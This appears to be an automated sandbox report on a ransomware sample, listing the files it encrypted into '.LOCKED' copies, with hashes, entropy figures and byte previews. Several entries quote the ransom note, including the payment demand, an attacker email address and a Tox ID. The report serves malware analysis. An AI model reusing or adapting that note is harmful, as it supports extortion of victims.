                                Encrypted:false
                                SSDEEP:24:diuDCxMbNz5z/wpDyYPGTNj0hOHAVMJg6WXs9dE:dxDaezN/WyYu+MAVMJg6TU
                                MD5:AB75D8C037578B71855A1986B041C955
                                SHA1:6F69A1E249BBEC66A8095DCC1DD717F48CB4B9A7
                                SHA-256:B299327BF45E050C7F6181C07594E8DA0A3AEF871E5639CA0887E7E820C5710F
                                SHA-512:24C62F553705CAE03B8997B06AF92ACB3684C31E494AAB11BD5DFCC3FAE1CCB8F10E18D4DDF57F57EBA9AAC28D11EFD0123A9992E7C0A34D34B7867C4CF0A4A8
                                Malicious:false
                                Preview:d2k ......D.....gG8.z.....z.....I..v.....%..hr.;..o76.d....HR.G..b..k.....(..i.....~...*w...).tw....t..W..()....DQ..T.Y.{G...k..E.f.C!........>.....6i....9.*137...\C..`.%..>:.?..#..n..B.+|.C..F>+..t.>....}V.../...JKE.Kq}.P}.5....J-=j.....p.;o-..H.._V...[..8.#.e..4dW`.W.9D=.=&..A....^D.6...AF..\..8...%..AT.S]...}[Q..-.XC<..c.:U.....UQ..*R...A..,.M7A.!..i#...A~.....].*_.`.Q.?....F..m..}.....PT....<e.M.o#.....Z/.....eU.zf.'._..W[c6....L..........j..\h0....Cl^.....)........J....`"./.5..H....?.d.5.......# ......./.G...X.Z^...l....R...(...i......N.".y..@..;........&..a...^.*....1%n.Ub\P|.@.EI..Q.vZ....)q.kW<....2....|=^UlF.......YA.t....Y.!<../....(.>.*.U...pCW....7eEa._.....Bl^.EU..:I...._.&.P.`.I.h.d.2>Z..!...N.G.)O..]..d(.....H.'....3.g.nm(.X.....................fk.W...f

                                C:\Program Files (x86)\autoit3\Include\word.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):33529
                                Entropy (8bit):7.995234203898862
                                Encrypted:true
                                SSDEEP:768:9fmVrJYLP8NTGzR3oiwZqi5P9op6fKzXXeDKjnI/yjAnGkjuzrdU:9KJ80dGzZ3Cg6WHrViqK
                                MD5:FC56C9037FCEE5E6FDA29AC1EAF1BE57
                                SHA1:71C9A8E693119C02C14CEFF8A7A162D3FCF6F102
                                SHA-256:DA9F11F3AAF37C541BA4F5A4E3A8C27219759BB7BB985A016DC34FF406045AE1
                                SHA-512:B96FDE5931A52866F5DB3519A8F0E98D6D817A16D600F3D1290D0B8B6224D7D18D1325C76A0B64E5E82427CEFCCEB3A0A1320108FAB25DF628EF5E8C504CE33E
                                Malicious:true
                                Preview:H.....x.....%|....m.1K+5...\ .......z:.E:.t.C...Z.)|....,.Qt?.._K$.S&.!>P..9..J....[...K...U..^...VI.z6\..]<i.d3....b..XIe.i...5.No..6N.L..|~m!?..,.Y|L.}$@........,..@V\b.....S.|....R8...MW..Q...Y.8^.1....M..daBg8..{..wX'.f.=.,..R.&...`..8.'D...!..-..v.i..Z.._..cD.Q..xnM.......>^.{..~t\..*..K...O...6.... .Y...|...r].e..h...5x.....J.e........<.fZ|.#.d..-y...}6z.Z._.@2..G.}).....B...^.....mZ..\.P......./..&..)v.Y33.IC.......a.....C...E.^J.H.[>.9.|s.sb5<..Z..5..'.q'.O.Ua........EcRK.N.!..}.+}.x....NU87..W.;.!n......JHb.j....K...=.;...c..T......mCc...7.V..:.z..s.N*+.P.Q9...{..$uM.....[j`.+'+.1;.c....#....`;c.V......c.rx.......K-.|.-..MB..Vx<.....T...:d.[."8.3I.n....q?t...d...ty.......?..^.m...j.........d..".c*..T...[.4..X..Uf.v...p....t..Zx...WIQ..~.(.....'...p..%,....5......]w.RL)........(...$...^.P^.xM3F.c...{P......]..L.=zKj....._./>"...g....1.+.p.".0..`j(........c.%l.:..MJ.....\T..ex...B.....,lO.Ou.....=..0i...6.St.y.R;W&K....Hz...2...aF

                                C:\Program Files (x86)\autoit3\SciTE\SciTE.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2373216
                                Entropy (8bit):7.227069398524338
                                Encrypted:false
                                SSDEEP:49152:oSXoV72tpzOhPwi1aCvY1U2AluS0RsG4fYw44RxL2:14zwiICvYu2wIsG6W
                                MD5:AA633D4C7C9C15C6DEBB2CEC9501FDA2
                                SHA1:DA983CB71CF57066108F647AEE05236919ACEDEF
                                SHA-256:A978B83E0A4F4833BD273D7A9EE981CCB539C79F14D624345FC4AA8C2CC470C8
                                SHA-512:373E088A2543DC494E9E75F11D163C35EED36047603B4B5E15B4E3A91EF9EFFECD83C8D3E726137F5A3FC310DA1358B00D0D84C0E34795FF38C5B7CE0DCF23BE
                                Malicious:false
                                Preview:M"....m...4.^..x...d..`..R..soC7....H...Na.)&...pK..@.C.>..yE.+J...(I...(.\...F2.3.Y.....\...x).X..w~...3.!)0...:8.....U-....Y..#.2<.....?|L.Wo1w|.H...P...o..<,.0..C..K..da&..Ty.K.cu..8&..E..~.............2...M.g...S...dE...$e...C..=...h.rmN.R...&.2..k.ek..S.q..l..&w1.C...jX..Il...gU%...'kN.!..r.[...l.6......7J...Mus.).....j........{NK..).9e.z.C.3.....5....}...<._g:.$J....G....0.......VC.#y......Z..n.;.`g.D../.-hOn...#~*..Xq.r6.h.~.......<.........fR.j..e.V].a.g'...s..s.l(B.[$.....R%.C*_4...ov..BWl.(..:....Q(.....j UE6...tI..l.3O.Pj...b%..e.N...K....Q.c...+.*...`.#.%V.v...s&.3X..H....K9.m....s...( ...N....p.D......X..Jls.h.....t@.... 0.f.....f....-..n...`~Q.;...uF....NO...t..V......D?}...u.%f..s...C....l..$..~.........hu..P3..o.....nB.1.e.u.L..g..H..>......IA~....m.|.&..+..k9...3,B..hf..{.~.....59...b.;6..p.h.F.U..gc.f.._W.f..5._.....k.y...Z.(..Z..".hg..........j...0....w...KBZ>....t.n......%.|.Z...C..D.E.[u.W..Id3}_$9;5i.2z..

                                C:\Program Files (x86)\autoit3\SciTE\au3.keywords.properties.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):92207
                                Entropy (8bit):7.997951408458284
                                Encrypted:true
                                SSDEEP:1536:RbYV+FLE0z9WZ1tOu+hsUDwoUZb4dPw2q+1XDxWr64AZrT3JU:6V+FYE+XOXwow4lwIXDRhTZU
                                MD5:696D2CA1AF57D4D618905BF094584FAC
                                SHA1:D6B2E51167FA69B34568CE3726ECD4F0973BC935
                                SHA-256:ABA72D6685AD351F397FECCF732A25E40E29CB31712DE861D5D1FBD30E2E0418
                                SHA-512:7609D7FDEBA5E11AF13B00B3A402F99729F4B7B2E1232716F31B4AE1F683483A3AA6414CBF1D2358476A42306EA26356119009B84BAB3CCFCD2DC8FB63C6307B
                                Malicious:true
                                Preview:k...mT.....^..2)...3....8*2.!-..K.^.....[.e...^{7K..`...1(.......'..6........o...a.....Tr.GT....8.w..t....U8.h... .9.\U..F...GZ.H.w..RV. .D,.8........[..._../.b..Dy...R.aISF..#WF.....k.1...!..x..9D.&".Y....o......p-1V).ny..%.Tf..^NQ.s/^e....T..ie...7.g......b.....r.yO.J......,.z.i..S...6!...i....L...{..d...7....j..N.........L..!.j..4....0.|...%6RQpt3.m..[b\...0..{ATw...jH..E5_,.>M.0.%.r8..,.U....D...*b.&....M.Vo}.o.+...b&@7#...%.d.d*.wY...oO.5..B.0k.\....n...l....3....B.WI...ms....-..(g...N....B&r.)....... dd.#Z..2ac8..R.......A.e%.8<.Z./..5...t.2..rm...,Q....I..8$c3b..(.'&/...Y..:}.B.19......... ...I...h..p].:/.${.....zQ......y.#:..y..f.|...1.h.z..}Gj.J...-.n.........q."I.....n1|v...$.d0..j _.$\.......#.XR}(m=D..(>.5.....E.H...#.. ......Z.<..0\...5.. ..w.../"+....;.B,...m.z.B..F .*.......J..B........../]..&..1..|....(!..0..,{y<O...F>..MY.H.Z...u.e9...2.s.F"H0...A..].....W.SHw.............&.a.P.,..*..V.S,..l...y^dhVlW |EA.....\w/w.x..:...

                                C:\Program Files (x86)\autoit3\Uninstall.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):72369
                                Entropy (8bit):7.997397042306235
                                Encrypted:true
                                SSDEEP:1536:NmNs1D50cNJks1xSZDfJTxtgyyK4LAuzfWzLAiyrbK0rr:ZfLjSVPiW41Xiyr3
                                MD5:55A4462794C4D62A168176F68CBC55A6
                                SHA1:F99C3A951F6C65175606567967418D6CC2607BBF
                                SHA-256:2D9F7E7EE22FE3F9C2248358AA9E6DE3690F33F1FA44FF3E7B6318EADBA17336
                                SHA-512:C1581EFCD2563780D4F4EC1E9EC97E5EA5C148C77A6B2867B86E17CDDCBA4D082FA113AAE1B58A2D55DF28B66C3418A2A3A60D6733B6424D6546B7CD3D621333
                                Malicious:true
                                Preview:.....].C:.3.8k..j.....1..MyR.U......Q.F......o..Ph.P...Sbr,."}..T^>.....8.Tk.H..=7.._/;.^....x....O=.W|...I,.q..1M...I...{.].w...H..B.Z.<.V.me...6..q"(_.~Gml.r...O;.7c....%^].rlH.Z..4}.......~X....p........G~..|..~X..p.(^......n.......k..8h..+....w|.;b.3s...?..Yd2...Q.L.2.Qzj..A......KzS....-#....e.U.....@..)X:...s.....ul=v..,:l^.....<..D.c....+Ml.tw.......O...X-r...[F.....=....\M....x....{..LK..fu...H.N.....@.2..y...}%`...9.G.f.....y..s..0.sY... N..e.R..86.tC..8...QR/.......+...\..H...9!Y..\D..h...f.{..o.......J.@...-.,wq~.t..Rm@L.J8....@.....}...{w@./-...G.j...QpcB.}@...-<.... ..-.:....../(U...q..9...h..#7.s./Q..........wp...:.*+.4...Q.y.1".C. -[...:TJ,...t......Z.9.x..[....p\..J......"....a...3..O.*)......J.....Y.._L.e..$....I...^*r.~....6.r..A0C..O6......../pE.`R5...s[.n..._.....u...|s..9e..+U.r&...Z\../+..]..P..=Q.N..W..6.&.o...y..).O.}."z...DX...S...~.<...3....v.s....X.7D{L...^...z.84b.7c..H..*-@..J1.[K.R._T..c.....g.../U.....r

                                C:\Program Files (x86)\jDownloader\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\jDownloader\config\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\java\jre-1.8\README.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\java\jre-1.8\bin\WindowsAccessBridge-32.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):171232
                                Entropy (8bit):7.99877932025843
                                Encrypted:true
                                SSDEEP:3072:66tbjJoQBQYrpCQYDsa+gfih7kffgHYCwDRGNTejJMJ7XgLZIsTJh3t:6aJ5BQbRDszgqh7Hbey7XgLH/t
                                MD5:24EB09FA6E46F218CB62B6B0F8849263
                                SHA1:E8AFE1324F5929F7937490253D8F8FA691FFB678
                                SHA-256:6E04B515DA0A3792EC81DD9DF5A890B58DDE4FE43134616328AAA145F35B2850
                                SHA-512:9564896FA20B13E4784D0481EFBF62F79509813D8321254BE05609B6EDF172391470C1F06EC312CBFDF4F9A5FA792A84FFEBBF71C971D8BFEAFAB66EE95D70FC
                                Malicious:true
                                Preview:t...9.YNEU...T..r.i.$....`d..J}..N........^..g.K.Pb.U.c....[..l.Q.x..Ap.........*...iib.!........(#...F.l.vZ.."'`4hEI#..DD....i...%0T.Df)...!.....Y)>....,.y..u...I.z..BJ.E$..|.......<..aA.*..Bz...A}....O..q.....A.+$>.,...k....>......v.`<.&..%6.!...Z..$./.,.nA..z,<M.0...........l...c......N.C.+....L.....=.."V.:..R...F.B..g..K..B.\.P..\..u.c..2.F...@...J.2.7.8.i..K.t........J...Y.w.K.....?...#..5...M......JYS0mxk..ju.u_x.b.68...0.2.<..m.g;.a..9.....).St....e.5.... ...+.^l.77.B.FY...J.....&.Du...-..sU.6..].C.B..8..7.....'...<#.U../E....o|....Oi ...b%wc...B!....PX..` ....(...r.......Z..0.....$..Z.L...'.........x{....V@E..t..z?..=..W...-........0...gOv.O.......#..qL&.$.F....K.#2..%P..1.|.j....rD.+.....#[..9.........m.Vhj.fq5.4...!.....Y...........q...F}...d.=..-.1.q...l........:...#l7l...iC.......9B........x........u.)..........\...C..V..G..........Q.~...=V#.s-...~..6EJ....a[..M%1..EQ.h=d.n+.f-..&ai.^.,.jV.N.a.L.'.[/7........?Hb.N..!_.yJ..

                                C:\Program Files (x86)\java\jre-1.8\bin\api-ms-win-crt-private-l1-1-0.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):66624
                                Entropy (8bit):7.997080360478528
                                Encrypted:true
                                SSDEEP:1536:Ns0EZ2y8+chPsz+181Tdx5zOVPVeTwPsxDTLaF:6zZ2Fh0aS1ZiVNrP4TLaF
                                MD5:CF9220E05F6B4F532F19CE62890BC8E3
                                SHA1:6A0E12DF092664D216B1FC065624B5F55C156FAB
                                SHA-256:07D88FDC6DAE4DD3E056353BBE9C18697D383F5EC52C9357506D1352F52E7C8E
                                SHA-512:D75CBDD69494242C56DB8431FB6D7A0F237186EE264226C073515E16B69AB3605F1DF1D2816C72BA1F1A6854952803602B944B0892ADF81FA5FA977DC06B4D1F
                                Malicious:true
                                Preview:....J......[$H*b..Q..o.~.;.ZI#...eV;...r.#CE#...)..64E..c.~y......6......."5...U......I.....!f$..J.. |4[....#x..3n.....%6;*.T ....y}@.Be...C. 1.....g...V.R......U..k.q?u...;.r..g.......ca......u.\.Y?.+.z.Z....v..._....B.Y..Wkp{.e..P=...A_0......1..?..R$.tm\z....6S.U.YU.B:.Y.fK9....)..B..).|.....c..G.pM...H.!......!Ad...t... ...^ ....n.u:.7bg..Y]..sD..d...6.p..(\,&...$.Q[.v(jK..k.h...j...f.$..F.......:.[.....Z6#Vt.K.6?.+.....?....A....w...........('N....n._ze...R*.w."..3&3.G.o....[.3<^.....9......*...rZd...7@.+........?..Gc3Z.P.m.m..C.pE'.2...a...C.JU.J.^..G...pz...U^G.'...K.'...{.U..,...J......l.x.j."...T....G..m.M......+>h...R7$..BM.\../:.GZx.dF.F.X ..2..J::gW%Y.>..8.... Ej`...O0N.b.._H.:L.2..!.@N,Y...ko.....Wx.....-..Z...+]._n..N.)nD.3.*..z...X..H;O....d...".=W..y*.0.?-.....E.g.G..x.../.......<....6..r)^...d.*J...g.i!4V{B0."..p........d)x.....R5..Ok.'..4...*....y..^;..Sy5}.-.....t..O&....Xf@m.N..b..{....(.&..<E....^.....<.

                                C:\Program Files (x86)\java\jre-1.8\bin\api-ms-win-crt-process-l1-1-0.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12864
                                Entropy (8bit):7.986297556161904
                                Encrypted:false
                                SSDEEP:384:0XRMA4Z2zFtbva9mCBgf1P/DST+J1dKH8ZoUHX+VOI:vA+qPdCBgf1D9108ZoeX0
                                MD5:D268FFE2C40AE8A0A6879586D0CC7D00
                                SHA1:A222C77006F1BF7574BAB8179C6DE1FDE73729E4
                                SHA-256:4AC9A9994FC9FF2A0E34237C9A344200F6AB55183830B3CB57A111C9271EBABF
                                SHA-512:1E07387E89CCD26E8A58D1939B0A00DCFF63FE4ED5AD3086ECF601ED8EB9ECC36B22FDD8743A348F5847E5055664535E7EDD9A97D1F6F2C528FA1321A4E2A082
                                Malicious:false
                                Preview:x.D.{.e.....[..:....K.T......^..X2.Y.i...`.....F...Ma) .....E@....qx;...1...<.v...a7..:..y.*!.....-0.].....b.e.-.r...7..p....5.#..6^..&4..x...|i ..Gc....u....=...=.....tq.....l.....(.o.!&L_. 3.?.......u..U..}3xLD.\...,..41T.....T.}.....P*@.?DO............./.G)<m.......qN......F._.I...J.X..m......F..>....h`.x.4Xyc..b^...0.v.,.T..F..%.s..`-../...[....._.~.`.v..\...m*...$..`?...fA......a6..P+Co..Z..Q...SA.j<o...#H..=C^./.;.!. _.%...?.t.Ea..."....U$.z...E.Ve.....Z..9.!...R.\..!d...U..A.n.S...G.....V....).O....I..Qd>Y.....NT.;.%d..0q..l...uY...;...(..9.8_H.........j./<...t............C..^...H=....k....G.b..m....1.1.].$2.>...."..AN.vHz.b...jc.......v.?D.......}0....N..q@.r...(.......*.%1....-....]..V....|.Ce.....}.V.....4.td..C.(...c......s.....pV<.......K/...e...2.....e..t...>.H....).ca.azgA...y.....Ot...../$..<..D.p.k...N..tS;.=q..u...RH..5..w4`.'.5..o9..C..8H..."..=..Z..<.=..Y.u.[...B.# <.wO.'_.".).a..$.j.1.lm.?...g=CR..s.\....s

                                C:\Program Files (x86)\java\jre-1.8\bin\api-ms-win-crt-runtime-l1-1-0.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16448
                                Entropy (8bit):7.9887060938908165
                                Encrypted:false
                                SSDEEP:384:aOsn8nQ+wtdqASIopCnSiOHz9+31ZGCTDshjFt9sb4aFo8h+VOh:a7np+wtdqbTes9MJT4179RaFo8hN
                                MD5:160399FA63DABAE089ECC49717A9AA50
                                SHA1:60E741DBDB60D6CC8CB33F7F95CAA5BB58702B08
                                SHA-256:C85FD6DDCFA50BBCF63C50C77B4036442DB46C361221F504225A8EA4ADF264BC
                                SHA-512:D492753F27D80A0D1B828249D9B8417BEB8B8B25A1AEF95FB90616A23F7115447DC61A724AD11B8949BD77AB8BB1A9EEB17EC3026460F1DBB3843C4662EE6163
                                Malicious:false
                                Preview:.. .......,.8.T{...y.V..7'....:.....yS.M.:d.s.n...e.Y..V+.[..W.......X.T^FT...s.Oo..._i'.a.......P..Q([.[/....M..k...%-g.4...&`.J'*.m..kFA..^.`...O..)(.N...?.....k....b.HD....5e...>.i.<8....8W.|...#.`.........7h.n.P....nP\....Q8&MJ..h8.m...U.{`...L.?v)JD.5b2*o..cl.}7..$.5.1..B.....b$.gI.f....}...@C./.5..+.#V..Y3JX.1./..oe.U.j..r.......)JF......V.....[s.9...y.C.....>........$..%.W.nkJ.).w0.^L0...c[.l1...u.......3...<...O...gEb......mx.x5.:....b..b8......>.u.'.....,?....z..aQK....qe..q;..X.W..].q..>+.A...a...]1>KD..\..O..I"..6S.w..A....m<..r.u.o.u.B.2e....U..D.3#...~.|......k.....Xf..v.?.,.HEn....;.zZ..*.z.lD*E.#.z.!D......A.(.Qd..?T.I..o<..Vr.g0....s.B..:,s!.Ya.9!.s.1......r!Y*J.../.+.WZ'.w.R'Hl.......]..5..z.xJEV...~..i.'.....!G... .r....N.!%p.K.M.,.V..2)...m.....a..I.....T.g.kM22d.N.5.M...*t.@...-.."...38..P....o...e...%o|.\.%.......>.^..E.*K(b]..n..QVI6*.....g........7....zIG{J...0...(..P..Y0....\....B.q.H...<.....}Q?. ...E

                                C:\Program Files (x86)\java\jre-1.8\bin\api-ms-win-crt-stdio-l1-1-0.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):17984
                                Entropy (8bit):7.989260435680841
                                Encrypted:false
                                SSDEEP:384:T1eiU5wdx3wpG2CtFtpBMjOWEWAU4cwY5FsIdoJglCOXdf5iLtMZD4jEDxP5p+VB:TfOOpcviBMnAU/X9oJ0XGO4QD95pg
                                MD5:8F944268E1221D0DE23D5502289D7F96
                                SHA1:E25B5AB7E0E7B9935C25FFEA704FEA46DB98594B
                                SHA-256:56B6B00F70C11D5F8E1CF5610979DA7C4AC933B6C9C0904310AE471A1EC1ABF1
                                SHA-512:1D47E7EE798C9F762A4D76C533B1F88A61523CECB16C376FC7B70E16D4613F65A8BB0183E3C465BE3B01094E79E9D8E83DA1DE0A88377B1F3FAD83488A1CF635
                                Malicious:false
                                Preview:(!...e...S`i~.z..A%..E2.n..^..J7..GM.=....O...........CHb>-.?hL.72....=F...`...V.........bIc.^>.A.X..B.3.+.FCN.g.h .<.../0.W~"{..*G..}...Ei.`~.p....|..\2Q....a..&b.IO.....<1...t.5....i.Gn./..#....T.mAX.T.Q....=.L.I&.JO....o.*....Bx..L``..M..6..#.P.u.i.T....."..1}.....j....}....5k.I.....E0i?.o..X..v.1a.?_.I....rm.M........iZR..'.;.....|.>..k.`......<..E./... .....W[...'.7Vi..%..So..Ur..c..s.....3.U.#..R$...Rk.-.d@.E\.@...z~...m..f....-...'l/$.c(Bk.."p1%.o.t......,#3I.Z=vn.L.N....5N..%D.u..\;bH@......../.....VstB..W.^r..~.9....mo....I.2:(.V...y....3...6..j2.^K.'..F....~... .1......*L...Y..|..D..jm!qd.{..........i..u=8x:...P...gC........!p.h....<..V.6$... K..<.f.U.v..E=.'..C.S.. .......l....h.3..Q..P6s..{2.....W..f..6.[...~.g;......'...`..j.@..-..6...b.u.81..V..6].........*.T.)."...Kl6!.}u....N.....]a8...\..;._!.'..7lp.~.N...9.........yi'.~....G]{-.Kj.R.+.NItc.h.-......cx....j...w=+f..I...d.)}..r...zF.S..#=...A..$.....y.......W..O..B

                                C:\Program Files (x86)\java\jre-1.8\bin\api-ms-win-crt-string-l1-1-0.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):18496
                                Entropy (8bit):7.988552136784182
                                Encrypted:false
                                SSDEEP:384:LdrbtI83SVU9leVmb60DfEIA1zHCMJzPFG5Oe8kUKe9d9MNo8gMqEDQ+VOl3:RrbKhq9leVmmccNNmUSqfd
                                MD5:AA171E4B73C2DC8058BC29FDD9AA45C0
                                SHA1:F42A03A982C880492DA01EE52E760BA2BF90C5A0
                                SHA-256:8714048B56D0C6132E9FBE06D202B66ABA125FCE89AA2C8C49EADCD3708366B2
                                SHA-512:C9E3EDC0DC26044B0F9B6AD7D7150D30741B697B9E5690BBE3CC4FECDCCD4022BE412984CD263AEE761A4D1B26A2110228DEDF4D0F56108715973D44A9E7EDDC
                                Malicious:false
                                Preview:..zSW.T..../."......kB.W..+....`.4b.......`2#*..R..I?....sP]......cx<..W.A.E.'.>..0.?.!...9.$1.}...i.'Q^..,B._._...T]m.....M....7K./3...|1.{.2...a7.Hi.\x...`{X.w.M...W....P..O#g..a.Q.....*.{/.(5*..}......)E.....-g....C...:..K..PRE..x[.=!p.D\....E..xQ.O .^..(.[.X..n)..@..`.q.>?...x.sAd..Y...Ui...C.j.$......5.O.e,.....j.[$.3'].....U...:m.P...-2...Jz.1.r....m>.y.F...U}..........ja........3..d,.+z........e...P.....a..rY..w.z..R..q.i..L.u.|..I...j.v.)I..vcVH..@`..Rh<..E...O5Dey......ds....hk=..0R....w..?$?..<..SI.t.hfeb._.y..^.Kh*.#.w....1..>d..`.$.j..\..#%...,....Zg..@......z.....)!S..?(.....u9...Z>..&[.*..c...D..........=...5....}=...JC.l.$.3.7...vl.v.I...3<*....g/.........y...(L...Ke.....q..|_.....T-.(..R.j.]Yif.V$.D4..EH..H.e.....x.(.J.IT.m.c..... ...S.3..!..e~7...,..VT:1....u.o.#..v@M..+..z.x.Y{#.'.......n...HE.1..0.....N.k.{..KW.).k......'MuUz_.T....I.F..w.t........Q^..}...E...2.0..&.k.h.SHJ.\D...[\....Mom..w8........W.fz.r.!r.....Y:.....i}..

                                C:\Program Files (x86)\java\jre-1.8\bin\api-ms-win-crt-time-l1-1-0.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14400
                                Entropy (8bit):7.986587460488451
                                Encrypted:false
                                SSDEEP:384:DPuCT8a2JikFsrBwr3n5PkTnKIf1RdOrDAc+VOq:DPH49Ji+D9BKKrEcG
                                MD5:EA0DC7A7FFBFCC60CBBE8B0B02B228C6
                                SHA1:532695866055A3B9D432FD13F1FD34044325ED6D
                                SHA-256:30A74DAC7EC18FFE46672863087D7E053881D16340263F055538414AB10BD674
